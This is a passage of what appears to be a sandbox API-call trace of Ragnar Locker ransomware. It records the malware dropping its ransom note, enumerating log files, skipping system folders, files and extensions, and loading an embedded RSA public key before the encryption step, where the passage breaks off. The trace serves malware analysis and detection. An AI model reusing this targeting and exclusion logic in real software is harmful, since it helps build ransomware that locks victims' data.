"c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\$getcurrent\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0165.154] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\$GetCurrent\\*.*") returned="\\\\?\\C:\\$GetCurrent\\*.*" [0165.154] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe570, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x16 [0165.154] lstrcpyW (in: lpString1=0x5cfe368, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0165.154] lstrcpyW (in: lpString1=0x5cfe596, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0165.155] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfeb8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfeb8c) returned 0x3548140 [0165.155] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0165.155] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xefa8f70f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.157] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0165.157] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0165.157] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa8e387, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xefa8e387, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0165.157] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0165.157] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0165.157] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0165.157] lstrcmpiW (lpString1="Logs", lpString2=".") returned 1 [0165.157] lstrcmpiW (lpString1="Logs", lpString2="..") returned 1 [0165.157] lstrcmpiW (lpString1="Logs", lpString2="Windows") returned -1 [0165.157] lstrcmpiW (lpString1="Logs", lpString2="Windows.old") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Tor browser") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Internet Explorer") returned 1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Google") returned 1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Opera") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Opera Software") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Mozilla") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="Mozilla Firefox") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="$Recycle.Bin") returned 1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="ProgramData") returned -1 [0165.158] lstrcmpiW (lpString1="Logs", lpString2="All Users") returned 1 [0165.158] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x16 [0165.158] lstrcpyW (in: lpString1=0x5cfe9aa, lpString2="Logs" | out: lpString1="Logs") returned="Logs" [0165.158] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\Logs", lpString2="\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\") returned="\\\\?\\C:\\$GetCurrent\\Logs\\" [0165.158] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\") returned="\\\\?\\C:\\$GetCurrent\\Logs\\" [0165.158] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\$GetCurrent\\Logs\\!$R4GN4R_B8CF767A$!.txt" [0165.158] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\$getcurrent\\logs\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0165.163] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\*.*") returned="\\\\?\\C:\\$GetCurrent\\Logs\\*.*" [0165.163] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1b [0165.163] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0165.163] lstrcpyW (in: lpString1=0x5cfd894, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0165.163] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c80 [0165.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0165.164] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xefc93db1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.166] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0165.166] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0165.166] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc93db1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xefc93db1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0165.166] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0165.166] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0165.166] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="")) returned 1 [0165.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2=".") returned 1 [0165.166] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="..") returned 1 [0165.166] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="")) returned 1 [0165.166] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2=".") returned 1 [0165.166] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="..") returned 1 [0165.166] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="")) returned 1 [0165.166] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2=".") returned 1 [0165.167] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="..") returned 1 [0165.167] FindNextFileW (in: hFindFile=0x3547c80, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="")) returned 0 [0165.167] FindClose (in: hFindFile=0x3547c80 | out: hFindFile=0x3547c80) returned 1 [0165.167] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c40 [0165.167] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0xefc93db1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xefc93db1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.167] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc93db1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xefc93db1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0165.167] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1b [0165.167] lstrcpyW (in: lpString1=0x5cfda9c, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0165.167] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0165.167] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0165.167] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="")) returned 1 [0165.167] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1b [0165.167] lstrcpyW (in: lpString1=0x5cfda9c, lpString2="downlevel_2017_09_07_02_02_39_766.log" | out: lpString1="downlevel_2017_09_07_02_02_39_766.log") returned="downlevel_2017_09_07_02_02_39_766.log" [0165.168] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned=".log" [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="autorun.inf") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="boot.ini") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="bootfont.bin") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="bootsect.bak") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="bootmgr") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="bootmgr.efi") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="bootmgfw.efi") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="desktop.ini") returned 1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="iconcache.db") returned -1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="ntldr") returned -1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="ntuser.dat") returned -1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="ntuser.dat.log") returned -1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="ntuser.ini") returned -1 [0165.168] lstrcmpiW (lpString1="downlevel_2017_09_07_02_02_39_766.log", lpString2="thumbs.db") returned -1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".db") returned 1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0165.168] lstrcmpiW (lpString1=".log", lpString2=".drv") returned 1 [0165.169] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0165.169] GetProcessHeap () returned 0x3520000 [0165.169] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3604f08 [0165.171] lstrcpyW (in: lpString1=0x3605308, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" [0165.171] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="")) returned 1 [0165.171] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1b [0165.171] lstrcpyW (in: lpString1=0x5cfda9c, lpString2="oobe_2017_09_07_03_08_57_737.log" | out: lpString1="oobe_2017_09_07_03_08_57_737.log") returned="oobe_2017_09_07_03_08_57_737.log" [0165.172] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned=".log" [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="autorun.inf") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="boot.ini") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="bootfont.bin") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="bootsect.bak") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="bootmgr") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="bootmgr.efi") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="bootmgfw.efi") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="desktop.ini") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="iconcache.db") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="ntldr") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="ntuser.dat") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="ntuser.dat.log") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="ntuser.ini") returned 1 [0165.172] lstrcmpiW (lpString1="oobe_2017_09_07_03_08_57_737.log", lpString2="thumbs.db") returned -1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".db") returned 1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0165.172] lstrcmpiW (lpString1=".log", lpString2=".drv") returned 1 [0165.173] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0165.173] GetProcessHeap () returned 0x3520000 [0165.173] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d30060 [0165.174] lstrcpyW (in: lpString1=0x5d30460, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" [0165.174] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="")) returned 1 [0165.174] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\Logs\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1b [0165.174] lstrcpyW (in: lpString1=0x5cfda9c, lpString2="PartnerSetupCompleteResult.log" | out: lpString1="PartnerSetupCompleteResult.log") returned="PartnerSetupCompleteResult.log" [0165.174] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned=".log" [0165.174] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0165.174] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="autorun.inf") returned 1 [0165.174] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="boot.ini") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="bootfont.bin") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="bootsect.bak") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="bootmgr") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="bootmgr.efi") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="bootmgfw.efi") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="desktop.ini") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="iconcache.db") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="ntldr") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="ntuser.dat") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="ntuser.dat.log") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="ntuser.ini") returned 1 [0165.175] lstrcmpiW (lpString1="PartnerSetupCompleteResult.log", lpString2="thumbs.db") returned -1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".db") returned 1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".drv") returned 1 [0165.175] lstrcmpiW (lpString1=".log", lpString2=".exe") returned 1 [0165.175] GetProcessHeap () returned 0x3520000 [0165.175] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d3d1d8 [0165.177] lstrcpyW (in: lpString1=0x5d3d5d8, lpString2="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" [0165.177] FindNextFileW (in: hFindFile=0x3547c40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="")) returned 0 [0165.177] GetProcessHeap () returned 0x3520000 [0165.177] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x357e308 [0165.177] CryptAcquireContextW (in: phProv=0x357e308, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x357e308*=0x3557078) returned 1 [0165.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0165.392] GetProcessHeap () returned 0x3520000 [0165.392] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x3592b18 [0165.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x3592b18, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0165.392] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC 